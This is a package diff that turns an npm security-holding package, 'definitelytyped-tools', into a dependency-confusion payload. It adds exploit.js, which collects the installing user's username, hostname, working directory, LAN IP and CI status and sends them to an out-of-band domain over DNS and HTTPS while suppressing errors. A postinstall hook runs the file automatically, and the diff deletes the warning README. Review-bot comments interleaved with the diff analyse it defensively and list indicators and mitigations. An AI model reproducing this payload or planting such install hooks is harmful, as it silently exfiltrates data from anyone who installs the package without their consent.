definitelytyped-tools 0.0.1-security → 96.99.9
- package/exploit.js +96 -0
- package/package.json +6 -3
- package/README.md +0 -5
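--- a/package/exploit.js
+++ b/package/exploit.js
@@ -0,0 +1,96 @@
+/*
+* ==========================================================================================
+* == FINAL, ENHANCED, & STEALTHY PROOF-OF-CONCEPT PAYLOAD
+* ==
+* == Target: Dependency Confusion RCE
+* == Author: [Security Researcher]
+* == Objective: Non-destructively prove RCE by exfiltrating a safe, detailed
+* == fingerprint of the execution environment.
+* ==
+* == FEATURES:
+* == [+] Dual-Channel Exfiltration: Primary DNS (UDP/53) + Fallback HTTPS POST (TCP/443).
+* == [+] Enhanced Fingerprinting: Includes CI/CD detection, OS info, and user context.
+* == [+] Maximum Stealth: Uses only native Node.js APIs (no shell spawning).
+* == [+] Robust Error Handling: Designed to never crash the host install process.
+* ==========================================================================================
+*/
+
+const os = require('os');
+const dns = require('dns');
+const https = require('https');
+
+// ============================= CONFIGURATION ==============================
+// --------------------------------------------------------------------------
+// --- REPLACE THIS WITH YOUR UNIQUE OAST (INTERACTSH) DOMAIN ---
+const OAST_DOMAIN = 'ocvomeqbrouywnpfvqwhknntlb54bf276.oast.fun';
+// --------------------------------------------------------------------------
+// ==========================================================================
+
+// Main execution wrapped to catch any unexpected errors.
+try {
+// A helper function to get the primary, non-internal IPv4 address.
+const getIPAddress = () => {
+const interfaces = os.networkInterfaces();
+for (const name of Object.keys(interfaces)) {
+for (const iface of interfaces[name]) {
+if (iface.family === 'IPv4' && !iface.internal) {
+return iface.address;
+}
+}
+}
+return '127.0.0.1'; // Fallback
+};
+
+// Collect a rich but safe fingerprint of the environment.
+const fingerprint = {
+timestamp: new Date().toISOString(),
+user: os.userInfo().username || 'unknown_user',
+host: os.hostname() || 'unknown_host',
+cwd: process.cwd() || 'unknown_cwd',
+platform: os.platform(),
+arch: os.arch(),
+nodeVersion: process.version,
+ip: getIPAddress(),
+isCI: !!(process.env.CI || process.env.GITHUB_ACTIONS || process.env.GITLAB_CI),
+};
+
+// --- PRIMARY EXFILTRATION: STEALTHY DNS ---
+// This is the most likely to succeed in restricted environments.
+try {
+const data = `h=${fingerprint.host}__u=${fingerprint.user}__p=${fingerprint.cwd}`;
+const hexPayload = Buffer.from(data).toString('hex');
+const chunks = hexPayload.match(/.{1,60}/g) || []; // 60 char chunks for DNS label safety
+
+chunks.forEach((chunk, i) => {
+const subdomain = `p${i}.${chunk}.${OAST_DOMAIN}`;
+// Fire-and-forget lookup. Non-blocking and silent.
+dns.lookup(subdomain, () => {});
+});
+} catch (e) {
+// Fails silently if DNS exfiltration has an error.
+}
+
+// --- FALLBACK EXFILTRATION: HTTPS POST ---
+// Disguised as normal JSON API traffic.
+try {
+const jsonData = JSON.stringify(fingerprint);
+const options = {
+hostname: OAST_DOMAIN,
+path: '/',
+method: 'POST',
+headers: {
+'Content-Type': 'application/json',
+'Content-Length': Buffer.byteLength(jsonData),
+},
+};
+
+const req = https.request(options);
+req.on('error', () => {}); // Suppress any errors to prevent crashes.
+req.write(jsonData);
+req.end();
+} catch (e) {
+// Fails silently if HTTPS exfiltration has an error.
+}
+} catch (e) {
+// Top-level catch to ensure the script NEVER crashes the install.
+}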
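Review bot: The header comment calls this payload "safe" and "non-destructive", but the `fingerprint` object (new lines 45–55) gathers the installing user's username, hostname, working directory, LAN IPv4 address and CI status, and the two blocks that follow (lines 59–90) send that data to a third-party OAST domain over DNS and HTTPS — from any machine that installs the package, without consent, which is data exfiltration regardless of the stated intent. The empty `catch (e) {}` blocks and `req.on('error', () => {})` exist to hide failures from the victim's install log, not to protect the host, so nothing in this file is salvageable as a change; the whole addition is the finding. For defenders, the domain `ocvomeqbrouywnpfvqwhknntlb54bf276.oast.fun` and DNS queries of the form `p<N>.<hex>.<that domain>` (built on line 65) are concrete indicators to hunt for in resolver and egress-proxy logs, and hex-decoding the labels tells you exactly which hosts, users and paths were exposed. The file only runs because package.json wires it into `postinstall`; installing with `npm install --ignore-scripts` (or `ignore-scripts=true` in .npmrc) and pinning internal package names to a private registry scope removes the execution path.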
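--- a/package/package.json
+++ b/package/package.json
@@ -1,6 +1,9 @@
 {
 "name": "definitelytyped-tools",
-"version": "
-"description": "
-"
+"version": "96.99.9",
+"description": "Enhanced PoC for Critical RCE",
+"main": "exploit.js",
+"scripts": {
+"postinstall": "node exploit.js"
+}
 }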
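Review bot: The added `"postinstall": "node exploit.js"` (new lines 6–8) turns installation itself into the execution path: any `npm install` that resolves this version runs the new file with the installing user's privileges before anyone has read it, and the jump from the `0.0.1-security` holding package to `96.99.9` is the signature of a dependency-confusion grab that wins `^`-range or `latest` resolution over a legitimate internal package of the same name. The description `"Enhanced PoC for Critical RCE"` states the intent, and the companion deletion of README.md removes the npm security-holding notice that warned users about this name, so none of this is a legitimate change to accept. Detection: alert on `preinstall`/`install`/`postinstall` scripts appearing in newly added or version-jumped dependencies, and on `main` pointing at a file absent from the previous version. Mitigation: `ignore-scripts=true`, lockfile-pinned installs with `npm ci`, and scoping internal package names to a private registry so public look-alikes cannot be selected.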
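--- a/package/README.md
+++ b/package/README.md
@@ -1,5 +0,0 @@
-# Security holding package
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=definitelytyped-tools for more information.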